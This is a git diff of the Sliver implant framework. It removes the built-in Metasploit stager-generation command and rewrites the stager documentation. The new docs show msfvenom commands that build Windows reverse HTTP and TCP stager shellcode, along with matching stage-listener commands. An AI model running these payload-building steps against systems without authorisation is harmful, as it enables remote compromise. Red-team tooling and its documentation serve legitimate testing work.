diff --git a/client/command/exec/msf-inject.go b/client/command/exec/msf-inject.go
index 4039a2dcc9..393e57c79b 100644
--- a/client/command/exec/msf-inject.go
+++ b/client/command/exec/msf-inject.go
@@ -49,7 +49,7 @@ func MsfInjectCmd(cmd *cobra.Command, con *console.SliverClient, args []string)
return
}
if pid == -1 {
- con.PrintErrorf("Invalid pid '%s', see `help %s`\n", lhost, consts.MsfInjectStr)
+ con.PrintErrorf("Invalid pid '%d', see `help %s`\n", pid, consts.MsfInjectStr)
return
}
var goos string
diff --git a/client/command/generate/commands.go b/client/command/generate/commands.go
index e042a67c72..1e87f2508e 100644
--- a/client/command/generate/commands.go
+++ b/client/command/generate/commands.go
@@ -48,30 +48,6 @@ func Commands(con *console.SliverClient) []*cobra.Command {
generateCmd.AddCommand(generateBeaconCmd)
- generateStagerCmd := &cobra.Command{
- Use: consts.MsfStagerStr,
- Short: "Generate a stager using Metasploit (requires local Metasploit installation)",
- Long: help.GetHelpFor([]string{consts.MsfStagerStr}),
- Run: func(cmd *cobra.Command, args []string) {
- GenerateStagerCmd(cmd, con, args)
- },
- }
- flags.Bind("stager", false, generateStagerCmd, func(f *pflag.FlagSet) {
- f.StringP("os", "o", "windows", "operating system")
- f.StringP("arch", "a", "amd64", "cpu architecture")
- f.StringP("lhost", "L", "", "Listening host")
- f.Uint32P("lport", "l", 8443, "Listening port")
- f.StringP("protocol", "r", "tcp", "Staging protocol (tcp/http/https)")
- f.StringP("format", "f", "raw", "Output format (msfvenom formats, see help generate msf-stager for the list)")
- f.StringP("badchars", "b", "", "bytes to exclude from stage shellcode")
- f.StringP("save", "s", "", "directory to save the generated stager to")
- f.StringP("advanced", "d", "", "Advanced options for the stager using URI query syntax (option1=value1&option2=value2...)")
- })
- flags.BindFlagCompletions(generateStagerCmd, func(comp *carapace.ActionMap) {
- (*comp)["save"] = carapace.ActionFiles().Tag("directory/file to save implant")
- })
- generateCmd.AddCommand(generateStagerCmd)
-
generateInfoCmd := &cobra.Command{
Use: consts.CompilerInfoStr,
Short: "Get information about the server's compiler",
diff --git a/client/command/generate/generate-stager.go b/client/command/generate/generate-stager.go
deleted file mode 100644
index b30831c1dd..0000000000
--- a/client/command/generate/generate-stager.go
+++ /dev/null
@@ -1,131 +0,0 @@
-package generate
-
-/*
- Sliver Implant Framework
- Copyright (C) 2022 Bishop Fox
-
- This program is free software: you can redistribute it and/or modify
- it under the terms of the GNU General Public License as published by
- the Free Software Foundation, either version 3 of the License, or
- (at your option) any later version.
-
- This program is distributed in the hope that it will be useful,
- but WITHOUT ANY WARRANTY; without even the implied warranty of
- MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
- GNU General Public License for more details.
-
- You should have received a copy of the GNU General Public License
- along with this program. If not, see .
-*/
-
-import (
- "context"
- "fmt"
- "net"
- "os"
- "regexp"
- "strings"
-
- "github.com/AlecAivazis/survey/v2"
- "github.com/bishopfox/sliver/client/console"
- "github.com/bishopfox/sliver/protobuf/clientpb"
- "github.com/spf13/cobra"
-)
-
-// GenerateStagerCmd - Generate a stager using Metasploit.
-func GenerateStagerCmd(cmd *cobra.Command, con *console.SliverClient, args []string) {
- var stageProto clientpb.StageProtocol
- lhost, _ := cmd.Flags().GetString("lhost")
- if lhost == "" {
- con.PrintErrorf("Please specify a listening host")
- return
- }
- match, err := regexp.MatchString(`^[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}$`, lhost)
- if err != nil {
- return
- }
- if !match {
- addr, err := net.LookupHost(lhost)
- if err != nil {
- con.PrintErrorf("Error resolving %s: %v\n", lhost, err)
- return
- }
- if len(addr) > 1 {
- prompt := &survey.Select{
- Message: "Select an address",
- Options: addr,
- }
- err := survey.AskOne(prompt, &lhost)
- if err != nil {
- con.PrintErrorf("Error: %v\n", err)
- return
- }
- } else {
- lhost = addr[0]
- }
- }
- lport, _ := cmd.Flags().GetUint32("lport")
- stageOS, _ := cmd.Flags().GetString("os")
- arch, _ := cmd.Flags().GetString("arch")
- proto, _ := cmd.Flags().GetString("protocol")
- format, _ := cmd.Flags().GetString("format")
- badChars, _ := cmd.Flags().GetString("badchars")
- save, _ := cmd.Flags().GetString("save")
- advOptions, _ := cmd.Flags().GetString("advanced")
-
- bChars := make([]string, 0)
- if len(badChars) > 0 {
- for _, b := range strings.Split(badChars, " ") {
- bChars = append(bChars, fmt.Sprintf("\\x%s", b))
- }
- }
-
- switch proto {
- case "tcp":
- stageProto = clientpb.StageProtocol_TCP
- case "http":
- stageProto = clientpb.StageProtocol_HTTP
- case "https":
- stageProto = clientpb.StageProtocol_HTTPS
- default:
- con.PrintErrorf("%s staging protocol not supported\n", proto)
- return
- }
-
- ctrl := make(chan bool)
- con.SpinUntil("Generating stager, please wait ...", ctrl)
- stageFile, err := con.Rpc.MsfStage(context.Background(), &clientpb.MsfStagerReq{
- Arch: arch,
- BadChars: bChars,
- Format: format,
- Host: lhost,
- Port: lport,
- Protocol: stageProto,
- OS: stageOS,
- AdvOptions: advOptions,
- })
- ctrl <- true
- <-ctrl
-
- if err != nil {
- con.PrintErrorf("Error: %v - Please make sure Metasploit framework >= v6.2 is installed and msfvenom/msfconsole are in your PATH", err)
- return
- }
-
- if save != "" || format == "raw" {
- saveTo, err := saveLocation(save, stageFile.GetFile().GetName(), con)
- if err != nil {
- return
- }
-
- err = os.WriteFile(saveTo, stageFile.GetFile().GetData(), 0o700)
- if err != nil {
- con.PrintErrorf("Failed to write to: %s\n", saveTo)
- return
- }
- con.PrintInfof("Sliver implant stager saved to: %s\n", saveTo)
- } else {
- con.PrintInfof("Here's your stager:\n")
- con.Println(string(stageFile.GetFile().GetData()))
- }
-}
diff --git a/client/command/help/long-help.go b/client/command/help/long-help.go
index a2f0ce6b58..89dc61de69 100644
--- a/client/command/help/long-help.go
+++ b/client/command/help/long-help.go
@@ -45,7 +45,6 @@ var (
consts.InfoStr: infoHelp,
consts.UseStr: useHelp,
consts.GenerateStr: generateHelp,
- consts.MsfStagerStr: generateStagerHelp,
consts.StageListenerStr: stageListenerHelp,
consts.MsfStr: msfHelp,
@@ -196,33 +195,6 @@ Execution limits can be used to restrict the execution of a Sliver implant to ma
Due to the large number of options and C2s this can be a lot of typing. If you'd like to have a reusable a Sliver config
see 'help profiles new'. All "generate" flags can be saved into a profile, you can view existing profiles with the "profiles"
command.
-`
- generateStagerHelp = `[[.Bold]]Command:[[.Normal]] generate msf-stager
-[[.Bold]]About:[[.Normal]] Generate a new sliver stager shellcode and saves the output to the cwd or a path specified with --save, or to stdout using --format.
-
-[[.Bold]][[.Underline]]++ Bad Characters ++[[.Normal]]
-Bad characters must be specified like this for single bytes:
-
-generate msf-stager -b 00
-
-And like this for multiple bytes:
-
-generate msf-stager -b '00 0a cc'
-
-[[.Bold]][[.Underline]]++ Output Formats ++[[.Normal]]
-You can use the --format flag to print out the shellcode to stdout, in one of the following transform formats:
-[[.Bold]]bash c csharp dw dword hex java js_be js_le num perl pl powershell ps1 py python raw rb ruby sh vbapplication vbscript[[.Normal]]
-
-[[.Bold]][[.Underline]]++ Advanced Options ++[[.Normal]]
-If there are any advanced options you need to pass to msfvenom, you can use the --advanced flag to provide them. They must be provided in URI query format: option1=value1&option2=value2 and so on.
-The full list of advanced options is available using "show advanced" in msf for the payload corresponding to the chosen protocol:
- TCP: meterpreter/reverse_tcp
- HTTP: custom/reverse_winhttp
- HTTPS: custom/reverse_winhttps
-
-Example:
- To tell the stager to use the proxy proxy.corp.com:8080 with the user name "corp_drone" and password "MyPassword", you would pass the following string to --advanced:
- HttpProxyHost=proxy.corp.com&HttpProxyPort=8080&HttpProxyUser=corp_drone&HttpProxyPass=MyPassword
`
stageListenerHelp = `[[.Bold]]Command:[[.Normal]] stage-listener
[[.Bold]]About:[[.Normal]] Starts a stager listener bound to a Sliver profile.
diff --git a/client/constants/constants.go b/client/constants/constants.go
index 33307c0a0c..6ada8d891b 100644
--- a/client/constants/constants.go
+++ b/client/constants/constants.go
@@ -136,7 +136,6 @@ const (
C2GenerateStr = "generate"
RegenerateStr = "regenerate"
CompilerInfoStr = "info"
- MsfStagerStr = "msf-stager"
ProfilesStr = "profiles"
BeaconStr = "beacon"
BeaconsStr = "beacons"
diff --git a/docs/sliver-docs/pages/docs/md/Stagers.md b/docs/sliver-docs/pages/docs/md/Stagers.md
index 0cc064c634..bf3ce00ab5 100644
--- a/docs/sliver-docs/pages/docs/md/Stagers.md
+++ b/docs/sliver-docs/pages/docs/md/Stagers.md
@@ -50,7 +50,10 @@ ID Name Protocol Port
### Metasploit: Bring Your Own Stager
-If you want to use [stagers generated by the Metasploit Framework with Sliver](https://www.rapid7.com/blog/post/2022/09/16/metasploit-weekly-wrap-up-176/) (using `msfconsole`, `msfvenom` or the `generate stager` command), you will need to pass the additional `--prepend-size` flag to `stage-listener`, like this:
+**Using Metasploit stagers is only supported on Windows.**
+
+#### Generating an HTTP stager
+If you want to use [stagers generated by the Metasploit Framework with Sliver](https://www.rapid7.com/blog/post/2022/09/16/metasploit-weekly-wrap-up-176/) (using `msfconsole` or `msfvenom`), you will need to pass the additional `--prepend-size` flag to `stage-listener`, like this:
```
sliver > stage-listener --url http://192.168.122.1:1234 --profile win-shellcode --prepend-size
@@ -60,26 +63,32 @@ This will prepend the size of the payload to the final binary sent to the stager
Sliver staging listeners only accept `tcp://`, `http://` and `https://` schemes for the `--url` flag. The format for this flag is `scheme://IP:PORT`. If no value is specified for `PORT`, an error will be thrown out.
-We can now generate a stager using the `generate stager` command:
+Either `msfconsole` or `msfvenom` can be used directly to generate stager shellcodes or binaries with the `custom` payload type:
```
-sliver > generate stager --lhost 192.168.122.1 --lport 1234 --protocol http --save /tmp
-
-[*] Sliver stager saved to: /tmp/CIRCULAR_BRA
+msfvenom --payload windows/x64/custom/reverse_winhttp LHOST=192.168.122.1 LPORT=1234 LURI=/hello.woff --format raw --out /tmp/stager.bin
```
-By default, the staging protocol used is TCP. The `--protocol` flag can be used to specify either `tcp`, `http` or `https` as the staging protocol.
-The generated shellcode can now be used on the target system to start a new Sliver session.
+**Remark**: At the moment, the `custom/reverse_http` payload is not compatible with Sliver shellcodes (the stager crashes). However, one can use the `custom/reverse_winhttp` payload instead.
-## Generating Stagers with the Metasploit Framework
+Depending on the payload you choose, you can specify additional options, such as HTTP proxy settings. Use the `msfvenom` flag `--list-options` with a payload type or `show advanced` in `msfconsole`.
-The Metasploit framework can also be used to generate stager shellcodes or binaries. One can use either `msfconsole` or `msfvenom` directly, and choose a `custom` payload type:
+#### Generating a TCP stager
+Use the `stage-listener` command to set up a listener that will send the binary to the stager:
```
-msfvenom -p windows/x64/custom/reverse_winhttp LHOST=192.168.122.1 LPORT=1234 LURI=/hello.woff -f raw -o /tmp/stager.bin
+silver > stage-listener --url tcp://192.168.122.1:1234 --profile win-shellcode --prepend-size
```
-**Remark**: At the moment, the `custom/reverse_http` payload is not compatible with Sliver shellcodes (the stager crashes). However, one can use the `custom/reverse_winhttp` payload instead.
+Notice that we are using the `tcp://` scheme because this is a TCP stager. The `--prepend-size` option is still necessary because we will be using Metasploit.
+
+As above, either `msfconsole` or `msfvenom` can be used directly to generate stager shellcodes or binaries with the `custom` payload type. Here is an example using `msfvenom`:
+
+```
+# LHOST and LPORT should correspond to the --url parameter of your stage-listener command
+
+msfvenom --payload windows/x64/custom/reverse_tcp LHOST=192.168.122.1 LPORT=1234 --format raw --out /tmp/stager.bin
+```
## Custom Stagers
diff --git a/protobuf/clientpb/client.pb.go b/protobuf/clientpb/client.pb.go
index d6ba5105c8..7dd8e8a644 100644
--- a/protobuf/clientpb/client.pb.go
+++ b/protobuf/clientpb/client.pb.go
@@ -1,7 +1,7 @@
// Code generated by protoc-gen-go. DO NOT EDIT.
// versions:
-// protoc-gen-go v1.34.1
-// protoc v5.26.1
+// protoc-gen-go v1.28.1
+// protoc v4.25.3
// source: clientpb/client.proto
package clientpb
@@ -5613,7 +5613,6 @@ type MsfStagerReq struct {
OS string `protobuf:"bytes,5,opt,name=OS,proto3" json:"OS,omitempty"` // reserved for future usage
Protocol StageProtocol `protobuf:"varint,6,opt,name=Protocol,proto3,enum=clientpb.StageProtocol" json:"Protocol,omitempty"`
BadChars []string `protobuf:"bytes,7,rep,name=BadChars,proto3" json:"BadChars,omitempty"`
- AdvOptions string `protobuf:"bytes,8,opt,name=AdvOptions,proto3" json:"AdvOptions,omitempty"`
HTTPC2ConfigName string `protobuf:"bytes,9,opt,name=HTTPC2ConfigName,proto3" json:"HTTPC2ConfigName,omitempty"`
}
@@ -5698,13 +5697,6 @@ func (x *MsfStagerReq) GetBadChars() []string {
return nil
}
-func (x *MsfStagerReq) GetAdvOptions() string {
- if x != nil {
- return x.AdvOptions
- }
- return ""
-}
-
func (x *MsfStagerReq) GetHTTPC2ConfigName() string {
if x != nil {
return x.HTTPC2ConfigName
@@ -11892,7 +11884,7 @@ var file_clientpb_client_proto_rawDesc = []byte{
0x6e, 0x74, 0x73, 0x18, 0x03, 0x20, 0x01, 0x28, 0x09, 0x52, 0x09, 0x41, 0x72, 0x67, 0x75, 0x6d,
0x65, 0x6e, 0x74, 0x73, 0x22, 0x22, 0x0a, 0x0c, 0x53, 0x68, 0x65, 0x6c, 0x6c, 0x63, 0x6f, 0x64,
0x65, 0x52, 0x44, 0x49, 0x12, 0x12, 0x0a, 0x04, 0x44, 0x61, 0x74, 0x61, 0x18, 0x01, 0x20, 0x01,
- 0x28, 0x0c, 0x52, 0x04, 0x44, 0x61, 0x74, 0x61, 0x22, 0x8f, 0x02, 0x0a, 0x0c, 0x4d, 0x73, 0x66,
+ 0x28, 0x0c, 0x52, 0x04, 0x44, 0x61, 0x74, 0x61, 0x22, 0xef, 0x01, 0x0a, 0x0c, 0x4d, 0x73, 0x66,
0x53, 0x74, 0x61, 0x67, 0x65, 0x72, 0x52, 0x65, 0x71, 0x12, 0x12, 0x0a, 0x04, 0x41, 0x72, 0x63,
0x68, 0x18, 0x01, 0x20, 0x01, 0x28, 0x09, 0x52, 0x04, 0x41, 0x72, 0x63, 0x68, 0x12, 0x16, 0x0a,
0x06, 0x46, 0x6f, 0x72, 0x6d, 0x61, 0x74, 0x18, 0x02, 0x20, 0x01, 0x28, 0x09, 0x52, 0x06, 0x46,
@@ -11904,9 +11896,7 @@ var file_clientpb_client_proto_rawDesc = []byte{
0x17, 0x2e, 0x63, 0x6c, 0x69, 0x65, 0x6e, 0x74, 0x70, 0x62, 0x2e, 0x53, 0x74, 0x61, 0x67, 0x65,
0x50, 0x72, 0x6f, 0x74, 0x6f, 0x63, 0x6f, 0x6c, 0x52, 0x08, 0x50, 0x72, 0x6f, 0x74, 0x6f, 0x63,
0x6f, 0x6c, 0x12, 0x1a, 0x0a, 0x08, 0x42, 0x61, 0x64, 0x43, 0x68, 0x61, 0x72, 0x73, 0x18, 0x07,
- 0x20, 0x03, 0x28, 0x09, 0x52, 0x08, 0x42, 0x61, 0x64, 0x43, 0x68, 0x61, 0x72, 0x73, 0x12, 0x1e,
- 0x0a, 0x0a, 0x41, 0x64, 0x76, 0x4f, 0x70, 0x74, 0x69, 0x6f, 0x6e, 0x73, 0x18, 0x08, 0x20, 0x01,
- 0x28, 0x09, 0x52, 0x0a, 0x41, 0x64, 0x76, 0x4f, 0x70, 0x74, 0x69, 0x6f, 0x6e, 0x73, 0x12, 0x2a,
+ 0x20, 0x03, 0x28, 0x09, 0x52, 0x08, 0x42, 0x61, 0x64, 0x43, 0x68, 0x61, 0x72, 0x73, 0x12, 0x2a,
0x0a, 0x10, 0x48, 0x54, 0x54, 0x50, 0x43, 0x32, 0x43, 0x6f, 0x6e, 0x66, 0x69, 0x67, 0x4e, 0x61,
0x6d, 0x65, 0x18, 0x09, 0x20, 0x01, 0x28, 0x09, 0x52, 0x10, 0x48, 0x54, 0x54, 0x50, 0x43, 0x32,
0x43, 0x6f, 0x6e, 0x66, 0x69, 0x67, 0x4e, 0x61, 0x6d, 0x65, 0x22, 0x2f, 0x0a, 0x09, 0x4d, 0x73,
diff --git a/protobuf/clientpb/client.proto b/protobuf/clientpb/client.proto
index 49d1c89ad0..d6fe4acdeb 100644
--- a/protobuf/clientpb/client.proto
+++ b/protobuf/clientpb/client.proto
@@ -513,7 +513,6 @@ message MsfStagerReq {
string OS = 5; // reserved for future usage
StageProtocol Protocol = 6;
repeated string BadChars = 7;
- string AdvOptions = 8;
string HTTPC2ConfigName = 9;
}
diff --git a/protobuf/commonpb/common.pb.go b/protobuf/commonpb/common.pb.go
index da40185fdc..45460222b4 100644
--- a/protobuf/commonpb/common.pb.go
+++ b/protobuf/commonpb/common.pb.go
@@ -1,7 +1,7 @@
// Code generated by protoc-gen-go. DO NOT EDIT.
// versions:
-// protoc-gen-go v1.34.1
-// protoc v5.26.1
+// protoc-gen-go v1.28.1
+// protoc v4.25.3
// source: commonpb/common.proto
package commonpb
diff --git a/protobuf/dnspb/dns.pb.go b/protobuf/dnspb/dns.pb.go
index 6b3ab3c41c..503408e5af 100644
--- a/protobuf/dnspb/dns.pb.go
+++ b/protobuf/dnspb/dns.pb.go
@@ -1,7 +1,7 @@
// Code generated by protoc-gen-go. DO NOT EDIT.
// versions:
-// protoc-gen-go v1.34.1
-// protoc v5.26.1
+// protoc-gen-go v1.28.1
+// protoc v4.25.3
// source: dnspb/dns.proto
package dnspb
diff --git a/protobuf/rpcpb/services.pb.go b/protobuf/rpcpb/services.pb.go
index 2a88b0959b..57309faa7c 100644
--- a/protobuf/rpcpb/services.pb.go
+++ b/protobuf/rpcpb/services.pb.go
@@ -1,7 +1,7 @@
// Code generated by protoc-gen-go. DO NOT EDIT.
// versions:
-// protoc-gen-go v1.34.1
-// protoc v5.26.1
+// protoc-gen-go v1.28.1
+// protoc v4.25.3
// source: rpcpb/services.proto
package rpcpb
@@ -31,7 +31,7 @@ var file_rpcpb_services_proto_rawDesc = []byte{
0x72, 0x6f, 0x74, 0x6f, 0x1a, 0x15, 0x73, 0x6c, 0x69, 0x76, 0x65, 0x72, 0x70, 0x62, 0x2f, 0x73,
0x6c, 0x69, 0x76, 0x65, 0x72, 0x2e, 0x70, 0x72, 0x6f, 0x74, 0x6f, 0x1a, 0x15, 0x63, 0x6c, 0x69,
0x65, 0x6e, 0x74, 0x70, 0x62, 0x2f, 0x63, 0x6c, 0x69, 0x65, 0x6e, 0x74, 0x2e, 0x70, 0x72, 0x6f,
- 0x74, 0x6f, 0x32, 0xaa, 0x56, 0x0a, 0x09, 0x53, 0x6c, 0x69, 0x76, 0x65, 0x72, 0x52, 0x50, 0x43,
+ 0x74, 0x6f, 0x32, 0xf1, 0x55, 0x0a, 0x09, 0x53, 0x6c, 0x69, 0x76, 0x65, 0x72, 0x52, 0x50, 0x43,
0x12, 0x30, 0x0a, 0x0a, 0x47, 0x65, 0x74, 0x56, 0x65, 0x72, 0x73, 0x69, 0x6f, 0x6e, 0x12, 0x0f,
0x2e, 0x63, 0x6f, 0x6d, 0x6d, 0x6f, 0x6e, 0x70, 0x62, 0x2e, 0x45, 0x6d, 0x70, 0x74, 0x79, 0x1a,
0x11, 0x2e, 0x63, 0x6c, 0x69, 0x65, 0x6e, 0x74, 0x70, 0x62, 0x2e, 0x56, 0x65, 0x72, 0x73, 0x69,
@@ -328,404 +328,400 @@ var file_rpcpb_services_proto_rawDesc = []byte{
0x69, 0x65, 0x6e, 0x74, 0x70, 0x62, 0x2e, 0x49, 0x6d, 0x70, 0x6c, 0x61, 0x6e, 0x74, 0x50, 0x72,
0x6f, 0x66, 0x69, 0x6c, 0x65, 0x1a, 0x18, 0x2e, 0x63, 0x6c, 0x69, 0x65, 0x6e, 0x74, 0x70, 0x62,
0x2e, 0x49, 0x6d, 0x70, 0x6c, 0x61, 0x6e, 0x74, 0x50, 0x72, 0x6f, 0x66, 0x69, 0x6c, 0x65, 0x12,
- 0x37, 0x0a, 0x08, 0x4d, 0x73, 0x66, 0x53, 0x74, 0x61, 0x67, 0x65, 0x12, 0x16, 0x2e, 0x63, 0x6c,
- 0x69, 0x65, 0x6e, 0x74, 0x70, 0x62, 0x2e, 0x4d, 0x73, 0x66, 0x53, 0x74, 0x61, 0x67, 0x65, 0x72,
- 0x52, 0x65, 0x71, 0x1a, 0x13, 0x2e, 0x63, 0x6c, 0x69, 0x65, 0x6e, 0x74, 0x70, 0x62, 0x2e, 0x4d,
- 0x73, 0x66, 0x53, 0x74, 0x61, 0x67, 0x65, 0x72, 0x12, 0x41, 0x0a, 0x0c, 0x53, 0x68, 0x65, 0x6c,
- 0x6c, 0x63, 0x6f, 0x64, 0x65, 0x52, 0x44, 0x49, 0x12, 0x19, 0x2e, 0x63, 0x6c, 0x69, 0x65, 0x6e,
- 0x74, 0x70, 0x62, 0x2e, 0x53, 0x68, 0x65, 0x6c, 0x6c, 0x63, 0x6f, 0x64, 0x65, 0x52, 0x44, 0x49,
- 0x52, 0x65, 0x71, 0x1a, 0x16, 0x2e, 0x63, 0x6c, 0x69, 0x65, 0x6e, 0x74, 0x70, 0x62, 0x2e, 0x53,
- 0x68, 0x65, 0x6c, 0x6c, 0x63, 0x6f, 0x64, 0x65, 0x52, 0x44, 0x49, 0x12, 0x32, 0x0a, 0x0b, 0x47,
- 0x65, 0x74, 0x43, 0x6f, 0x6d, 0x70, 0x69, 0x6c, 0x65, 0x72, 0x12, 0x0f, 0x2e, 0x63, 0x6f, 0x6d,
- 0x6d, 0x6f, 0x6e, 0x70, 0x62, 0x2e, 0x45, 0x6d, 0x70, 0x74, 0x79, 0x1a, 0x12, 0x2e, 0x63, 0x6c,
- 0x69, 0x65, 0x6e, 0x74, 0x70, 0x62, 0x2e, 0x43, 0x6f, 0x6d, 0x70, 0x69, 0x6c, 0x65, 0x72, 0x12,
- 0x4b, 0x0a, 0x10, 0x53, 0x68, 0x65, 0x6c, 0x6c, 0x63, 0x6f, 0x64, 0x65, 0x45, 0x6e, 0x63, 0x6f,
- 0x64, 0x65, 0x72, 0x12, 0x1c, 0x2e, 0x63, 0x6c, 0x69, 0x65, 0x6e, 0x74, 0x70, 0x62, 0x2e, 0x53,
- 0x68, 0x65, 0x6c, 0x6c, 0x63, 0x6f, 0x64, 0x65, 0x45, 0x6e, 0x63, 0x6f, 0x64, 0x65, 0x52, 0x65,
- 0x71, 0x1a, 0x19, 0x2e, 0x63, 0x6c, 0x69, 0x65, 0x6e, 0x74, 0x70, 0x62, 0x2e, 0x53, 0x68, 0x65,
- 0x6c, 0x6c, 0x63, 0x6f, 0x64, 0x65, 0x45, 0x6e, 0x63, 0x6f, 0x64, 0x65, 0x12, 0x45, 0x0a, 0x13,
- 0x53, 0x68, 0x65, 0x6c, 0x6c, 0x63, 0x6f, 0x64, 0x65, 0x45, 0x6e, 0x63, 0x6f, 0x64, 0x65, 0x72,
- 0x4d, 0x61, 0x70, 0x12, 0x0f, 0x2e, 0x63, 0x6f, 0x6d, 0x6d, 0x6f, 0x6e, 0x70, 0x62, 0x2e, 0x45,
- 0x6d, 0x70, 0x74, 0x79, 0x1a, 0x1d, 0x2e, 0x63, 0x6c, 0x69, 0x65, 0x6e, 0x74, 0x70, 0x62, 0x2e,
- 0x53, 0x68, 0x65, 0x6c, 0x6c, 0x63, 0x6f, 0x64, 0x65, 0x45, 0x6e, 0x63, 0x6f, 0x64, 0x65, 0x72,
- 0x4d, 0x61, 0x70, 0x12, 0x41, 0x0a, 0x11, 0x54, 0x72, 0x61, 0x66, 0x66, 0x69, 0x63, 0x45, 0x6e,
- 0x63, 0x6f, 0x64, 0x65, 0x72, 0x4d, 0x61, 0x70, 0x12, 0x0f, 0x2e, 0x63, 0x6f, 0x6d, 0x6d, 0x6f,
- 0x6e, 0x70, 0x62, 0x2e, 0x45, 0x6d, 0x70, 0x74, 0x79, 0x1a, 0x1b, 0x2e, 0x63, 0x6c, 0x69, 0x65,
- 0x6e, 0x74, 0x70, 0x62, 0x2e, 0x54, 0x72, 0x61, 0x66, 0x66, 0x69, 0x63, 0x45, 0x6e, 0x63, 0x6f,
- 0x64, 0x65, 0x72, 0x4d, 0x61, 0x70, 0x12, 0x4c, 0x0a, 0x11, 0x54, 0x72, 0x61, 0x66, 0x66, 0x69,
- 0x63, 0x45, 0x6e, 0x63, 0x6f, 0x64, 0x65, 0x72, 0x41, 0x64, 0x64, 0x12, 0x18, 0x2e, 0x63, 0x6c,
- 0x69, 0x65, 0x6e, 0x74, 0x70, 0x62, 0x2e, 0x54, 0x72, 0x61, 0x66, 0x66, 0x69, 0x63, 0x45, 0x6e,
- 0x63, 0x6f, 0x64, 0x65, 0x72, 0x1a, 0x1d, 0x2e, 0x63, 0x6c, 0x69, 0x65, 0x6e, 0x74, 0x70, 0x62,
- 0x2e, 0x54, 0x72, 0x61, 0x66, 0x66, 0x69, 0x63, 0x45, 0x6e, 0x63, 0x6f, 0x64, 0x65, 0x72, 0x54,
- 0x65, 0x73, 0x74, 0x73, 0x12, 0x3d, 0x0a, 0x10, 0x54, 0x72, 0x61, 0x66, 0x66, 0x69, 0x63, 0x45,
- 0x6e, 0x63, 0x6f, 0x64, 0x65, 0x72, 0x52, 0x6d, 0x12, 0x18, 0x2e, 0x63, 0x6c, 0x69, 0x65, 0x6e,
- 0x74, 0x70, 0x62, 0x2e, 0x54, 0x72, 0x61, 0x66, 0x66, 0x69, 0x63, 0x45, 0x6e, 0x63, 0x6f, 0x64,
- 0x65, 0x72, 0x1a, 0x0f, 0x2e, 0x63, 0x6f, 0x6d, 0x6d, 0x6f, 0x6e, 0x70, 0x62, 0x2e, 0x45, 0x6d,
- 0x70, 0x74, 0x79, 0x12, 0x2f, 0x0a, 0x08, 0x57, 0x65, 0x62, 0x73, 0x69, 0x74, 0x65, 0x73, 0x12,
+ 0x41, 0x0a, 0x0c, 0x53, 0x68, 0x65, 0x6c, 0x6c, 0x63, 0x6f, 0x64, 0x65, 0x52, 0x44, 0x49, 0x12,
+ 0x19, 0x2e, 0x63, 0x6c, 0x69, 0x65, 0x6e, 0x74, 0x70, 0x62, 0x2e, 0x53, 0x68, 0x65, 0x6c, 0x6c,
+ 0x63, 0x6f, 0x64, 0x65, 0x52, 0x44, 0x49, 0x52, 0x65, 0x71, 0x1a, 0x16, 0x2e, 0x63, 0x6c, 0x69,
+ 0x65, 0x6e, 0x74, 0x70, 0x62, 0x2e, 0x53, 0x68, 0x65, 0x6c, 0x6c, 0x63, 0x6f, 0x64, 0x65, 0x52,
+ 0x44, 0x49, 0x12, 0x32, 0x0a, 0x0b, 0x47, 0x65, 0x74, 0x43, 0x6f, 0x6d, 0x70, 0x69, 0x6c, 0x65,
+ 0x72, 0x12, 0x0f, 0x2e, 0x63, 0x6f, 0x6d, 0x6d, 0x6f, 0x6e, 0x70, 0x62, 0x2e, 0x45, 0x6d, 0x70,
+ 0x74, 0x79, 0x1a, 0x12, 0x2e, 0x63, 0x6c, 0x69, 0x65, 0x6e, 0x74, 0x70, 0x62, 0x2e, 0x43, 0x6f,
+ 0x6d, 0x70, 0x69, 0x6c, 0x65, 0x72, 0x12, 0x4b, 0x0a, 0x10, 0x53, 0x68, 0x65, 0x6c, 0x6c, 0x63,
+ 0x6f, 0x64, 0x65, 0x45, 0x6e, 0x63, 0x6f, 0x64, 0x65, 0x72, 0x12, 0x1c, 0x2e, 0x63, 0x6c, 0x69,
+ 0x65, 0x6e, 0x74, 0x70, 0x62, 0x2e, 0x53, 0x68, 0x65, 0x6c, 0x6c, 0x63, 0x6f, 0x64, 0x65, 0x45,
+ 0x6e, 0x63, 0x6f, 0x64, 0x65, 0x52, 0x65, 0x71, 0x1a, 0x19, 0x2e, 0x63, 0x6c, 0x69, 0x65, 0x6e,
+ 0x74, 0x70, 0x62, 0x2e, 0x53, 0x68, 0x65, 0x6c, 0x6c, 0x63, 0x6f, 0x64, 0x65, 0x45, 0x6e, 0x63,
+ 0x6f, 0x64, 0x65, 0x12, 0x45, 0x0a, 0x13, 0x53, 0x68, 0x65, 0x6c, 0x6c, 0x63, 0x6f, 0x64, 0x65,
+ 0x45, 0x6e, 0x63, 0x6f, 0x64, 0x65, 0x72, 0x4d, 0x61, 0x70, 0x12, 0x0f, 0x2e, 0x63, 0x6f, 0x6d,
+ 0x6d, 0x6f, 0x6e, 0x70, 0x62, 0x2e, 0x45, 0x6d, 0x70, 0x74, 0x79, 0x1a, 0x1d, 0x2e, 0x63, 0x6c,
+ 0x69, 0x65, 0x6e, 0x74, 0x70, 0x62, 0x2e, 0x53, 0x68, 0x65, 0x6c, 0x6c, 0x63, 0x6f, 0x64, 0x65,
+ 0x45, 0x6e, 0x63, 0x6f, 0x64, 0x65, 0x72, 0x4d, 0x61, 0x70, 0x12, 0x41, 0x0a, 0x11, 0x54, 0x72,
+ 0x61, 0x66, 0x66, 0x69, 0x63, 0x45, 0x6e, 0x63, 0x6f, 0x64, 0x65, 0x72, 0x4d, 0x61, 0x70, 0x12,
0x0f, 0x2e, 0x63, 0x6f, 0x6d, 0x6d, 0x6f, 0x6e, 0x70, 0x62, 0x2e, 0x45, 0x6d, 0x70, 0x74, 0x79,
- 0x1a, 0x12, 0x2e, 0x63, 0x6c, 0x69, 0x65, 0x6e, 0x74, 0x70, 0x62, 0x2e, 0x57, 0x65, 0x62, 0x73,
- 0x69, 0x74, 0x65, 0x73, 0x12, 0x2f, 0x0a, 0x07, 0x57, 0x65, 0x62, 0x73, 0x69, 0x74, 0x65, 0x12,
- 0x11, 0x2e, 0x63, 0x6c, 0x69, 0x65, 0x6e, 0x74, 0x70, 0x62, 0x2e, 0x57, 0x65, 0x62, 0x73, 0x69,
